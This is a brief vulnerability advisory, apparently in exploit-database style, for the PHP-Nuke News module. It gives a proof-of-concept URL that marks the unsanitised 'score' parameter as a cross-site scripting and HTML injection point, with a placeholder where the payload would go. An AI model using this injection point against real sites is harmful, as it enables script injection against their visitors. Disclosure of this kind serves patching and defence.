# Software Link: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=1 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= note : This bug found by tampering passed data . coders don't sanitize and check user entry point for news rate. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= POC: http://server/modules.php?name=News&op=rate_complete&sid=6&score=[insert ur code here] 1. xss : 2. Html code injection : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=